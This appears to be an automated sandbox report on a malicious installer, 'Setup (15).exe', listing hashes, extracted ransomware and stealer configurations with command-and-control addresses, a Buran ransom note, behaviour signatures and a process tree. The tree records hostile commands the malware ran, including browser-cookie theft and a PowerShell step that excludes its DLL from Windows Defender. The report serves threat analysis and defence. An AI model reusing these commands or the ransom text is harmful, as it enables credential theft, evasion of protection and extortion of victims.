Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1817s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (15).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 387-2A9-EF5 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

redline

Botnet

23.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:44263

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 17 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 44 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 9 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 54 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    PID:2632
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:4036
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2624
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2616
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2324
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1848
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1248
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1044
                      • C:\Users\Admin\AppData\Roaming\wgsbiwi
                        C:\Users\Admin\AppData\Roaming\wgsbiwi
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:6740
                        • C:\Users\Admin\AppData\Roaming\wgsbiwi
                          C:\Users\Admin\AppData\Roaming\wgsbiwi
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:8184
                      • C:\Users\Admin\AppData\Roaming\tusbiwi
                        C:\Users\Admin\AppData\Roaming\tusbiwi
                        2⤵
                          PID:4244
                        • C:\Users\Admin\AppData\Roaming\wgsbiwi
                          C:\Users\Admin\AppData\Roaming\wgsbiwi
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:9008
                          • C:\Users\Admin\AppData\Roaming\wgsbiwi
                            C:\Users\Admin\AppData\Roaming\wgsbiwi
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5628
                        • C:\Users\Admin\AppData\Roaming\tusbiwi
                          C:\Users\Admin\AppData\Roaming\tusbiwi
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6668
                        • C:\Users\Admin\AppData\Roaming\wgsbiwi
                          C:\Users\Admin\AppData\Roaming\wgsbiwi
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4112
                          • C:\Users\Admin\AppData\Roaming\wgsbiwi
                            C:\Users\Admin\AppData\Roaming\wgsbiwi
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5516
                        • C:\Users\Admin\AppData\Roaming\tusbiwi
                          C:\Users\Admin\AppData\Roaming\tusbiwi
                          2⤵
                            PID:2056
                        • C:\Users\Admin\AppData\Local\Temp\Setup (15).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:648
                          • C:\Users\Admin\Documents\Sy8Smn3WlNY0g0FMgl9ox33q.exe
                            "C:\Users\Admin\Documents\Sy8Smn3WlNY0g0FMgl9ox33q.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2392
                            • C:\Users\Admin\Documents\Sy8Smn3WlNY0g0FMgl9ox33q.exe
                              "C:\Users\Admin\Documents\Sy8Smn3WlNY0g0FMgl9ox33q.exe"
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:4932
                          • C:\Users\Admin\Documents\kkWtNVg3HEIGb3VZ5t9poqQM.exe
                            "C:\Users\Admin\Documents\kkWtNVg3HEIGb3VZ5t9poqQM.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3380
                            • C:\Users\Admin\Documents\kkWtNVg3HEIGb3VZ5t9poqQM.exe
                              "C:\Users\Admin\Documents\kkWtNVg3HEIGb3VZ5t9poqQM.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:6304
                          • C:\Users\Admin\Documents\aQgwpgKDeY1YfvVzQirC9bsE.exe
                            "C:\Users\Admin\Documents\aQgwpgKDeY1YfvVzQirC9bsE.exe"
                            2⤵
                              PID:2464
                              • C:\Users\Admin\Documents\aQgwpgKDeY1YfvVzQirC9bsE.exe
                                "C:\Users\Admin\Documents\aQgwpgKDeY1YfvVzQirC9bsE.exe" -q
                                3⤵
                                • Executes dropped EXE
                                PID:4948
                            • C:\Users\Admin\Documents\RrOS_NpsYb1qjEyd619lZYW1.exe
                              "C:\Users\Admin\Documents\RrOS_NpsYb1qjEyd619lZYW1.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2736
                              • C:\Users\Admin\Documents\RrOS_NpsYb1qjEyd619lZYW1.exe
                                C:\Users\Admin\Documents\RrOS_NpsYb1qjEyd619lZYW1.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4756
                            • C:\Users\Admin\Documents\6aeNHrZ4FLprUXrImovwPiDB.exe
                              "C:\Users\Admin\Documents\6aeNHrZ4FLprUXrImovwPiDB.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3364
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im 6aeNHrZ4FLprUXrImovwPiDB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\6aeNHrZ4FLprUXrImovwPiDB.exe" & del C:\ProgramData\*.dll & exit
                                3⤵
                                  PID:5792
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im 6aeNHrZ4FLprUXrImovwPiDB.exe /f
                                    4⤵
                                    • Kills process with taskkill
                                    PID:4184
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    4⤵
                                    • Executes dropped EXE
                                    • Delays execution with timeout.exe
                                    PID:6860
                              • C:\Users\Admin\Documents\cg0CX70OJ4Nu6QLl7l5BeyN5.exe
                                "C:\Users\Admin\Documents\cg0CX70OJ4Nu6QLl7l5BeyN5.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2664
                                • C:\Users\Admin\Documents\cg0CX70OJ4Nu6QLl7l5BeyN5.exe
                                  "C:\Users\Admin\Documents\cg0CX70OJ4Nu6QLl7l5BeyN5.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:5792
                              • C:\Users\Admin\Documents\4UWr7dZWYWh4OdV_Ck_V_Xva.exe
                                "C:\Users\Admin\Documents\4UWr7dZWYWh4OdV_Ck_V_Xva.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3864
                              • C:\Users\Admin\Documents\rZwDgYagcQnC2NVppG7DGoMe.exe
                                "C:\Users\Admin\Documents\rZwDgYagcQnC2NVppG7DGoMe.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:3920
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im rZwDgYagcQnC2NVppG7DGoMe.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\rZwDgYagcQnC2NVppG7DGoMe.exe" & del C:\ProgramData\*.dll & exit
                                  3⤵
                                    PID:5768
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im rZwDgYagcQnC2NVppG7DGoMe.exe /f
                                      4⤵
                                      • Kills process with taskkill
                                      PID:5376
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:2204
                                • C:\Users\Admin\Documents\rF84DcC0XlKB7oU0QNRmpAm4.exe
                                  "C:\Users\Admin\Documents\rF84DcC0XlKB7oU0QNRmpAm4.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:792
                                • C:\Users\Admin\Documents\z7zPaDgBJ7lwrmR9SJVKMc89.exe
                                  "C:\Users\Admin\Documents\z7zPaDgBJ7lwrmR9SJVKMc89.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2012
                                  • C:\Users\Admin\Documents\z7zPaDgBJ7lwrmR9SJVKMc89.exe
                                    C:\Users\Admin\Documents\z7zPaDgBJ7lwrmR9SJVKMc89.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:4740
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 1208
                                      4⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5436
                                • C:\Users\Admin\Documents\P2vqneoMmPuKSSuMKvJadR9G.exe
                                  "C:\Users\Admin\Documents\P2vqneoMmPuKSSuMKvJadR9G.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3820
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 660
                                    3⤵
                                    • Program crash
                                    PID:3980
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 676
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4288
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 680
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4344
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 732
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2108
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 1160
                                    3⤵
                                    • Program crash
                                    PID:3768
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 1152
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1768
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 1120
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4432
                                • C:\Users\Admin\Documents\ImQEbdeCAQ20rGBrZVrQsHp0.exe
                                  "C:\Users\Admin\Documents\ImQEbdeCAQ20rGBrZVrQsHp0.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:576
                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4168
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5136
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4480
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:3936
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:6676
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 4168 -s 1476
                                      4⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:6392
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4980
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4264
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2464
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:1920
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:3968
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:8836
                                    • C:\Users\Admin\Documents\FdTwZzySl8xLCEhH6g0wue1K.exe
                                      "C:\Users\Admin\Documents\FdTwZzySl8xLCEhH6g0wue1K.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:3760
                                      • C:\Users\Admin\Documents\FdTwZzySl8xLCEhH6g0wue1K.exe
                                        C:\Users\Admin\Documents\FdTwZzySl8xLCEhH6g0wue1K.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4716
                                    • C:\Users\Admin\Documents\vknD0ATLjHw2BkxuALAGvqX5.exe
                                      "C:\Users\Admin\Documents\vknD0ATLjHw2BkxuALAGvqX5.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3160
                                    • C:\Users\Admin\Documents\j2uH5vyDbsSWOyQBPBiQdWB9.exe
                                      "C:\Users\Admin\Documents\j2uH5vyDbsSWOyQBPBiQdWB9.exe"
                                      2⤵
                                        PID:3556
                                      • C:\Users\Admin\Documents\lTdARvNzLhrSRWDDbUC_YlI_.exe
                                        "C:\Users\Admin\Documents\lTdARvNzLhrSRWDDbUC_YlI_.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:1524
                                      • C:\Users\Admin\Documents\0SDRNlaKVLytRdopwwPIYaS2.exe
                                        "C:\Users\Admin\Documents\0SDRNlaKVLytRdopwwPIYaS2.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1416
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\0SDRNL~1.DLL,s C:\Users\Admin\DOCUME~1\0SDRNL~1.EXE
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          PID:4236
                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\0SDRNL~1.DLL,jUBNcHBJRjc=
                                            4⤵
                                            • Blocklisted process makes network request
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            • Modifies system certificate store
                                            PID:5860
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\0SDRNL~1.DLL
                                              5⤵
                                                PID:3844
                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\0SDRNL~1.DLL,XzokSzRZOVpv
                                                5⤵
                                                • Suspicious use of SetThreadContext
                                                • Checks processor information in registry
                                                PID:1356
                                                • C:\Windows\system32\rundll32.exe
                                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                  6⤵
                                                    PID:1952
                                                    • C:\Windows\system32\ctfmon.exe
                                                      ctfmon.exe
                                                      7⤵
                                                        PID:3744
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp5968.tmp.ps1"
                                                    5⤵
                                                      PID:1052
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp71D7.tmp.ps1"
                                                      5⤵
                                                        PID:6364
                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                          "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                          6⤵
                                                            PID:4588
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                          5⤵
                                                            PID:2204
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                            5⤵
                                                              PID:9116
                                                      • C:\Users\Admin\Documents\B0m3nJcdf1PM9fYVcg6oA4FX.exe
                                                        "C:\Users\Admin\Documents\B0m3nJcdf1PM9fYVcg6oA4FX.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:1400
                                                        • C:\Users\Admin\Documents\B0m3nJcdf1PM9fYVcg6oA4FX.exe
                                                          "C:\Users\Admin\Documents\B0m3nJcdf1PM9fYVcg6oA4FX.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:5144
                                                      • C:\Users\Admin\Documents\UaknCH3EJQTdkYUqia4rM3G3.exe
                                                        "C:\Users\Admin\Documents\UaknCH3EJQTdkYUqia4rM3G3.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1104
                                                      • C:\Users\Admin\Documents\ppDDSZjoP6QBdKGzcUisKQc0.exe
                                                        "C:\Users\Admin\Documents\ppDDSZjoP6QBdKGzcUisKQc0.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1232
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:3556
                                                      • C:\Users\Admin\Documents\srx17UjXQeKHoITCe6QYeDRQ.exe
                                                        "C:\Users\Admin\Documents\srx17UjXQeKHoITCe6QYeDRQ.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:4068
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 276
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4516
                                                      • C:\Users\Admin\Documents\tXeyMBYzZkXAvBObko0hyUE0.exe
                                                        "C:\Users\Admin\Documents\tXeyMBYzZkXAvBObko0hyUE0.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3196
                                                        • C:\Users\Admin\AppData\Roaming\4102863.exe
                                                          "C:\Users\Admin\AppData\Roaming\4102863.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:3300
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:5808
                                                        • C:\Users\Admin\AppData\Roaming\6946888.exe
                                                          "C:\Users\Admin\AppData\Roaming\6946888.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1556
                                                        • C:\Users\Admin\AppData\Roaming\7086666.exe
                                                          "C:\Users\Admin\AppData\Roaming\7086666.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
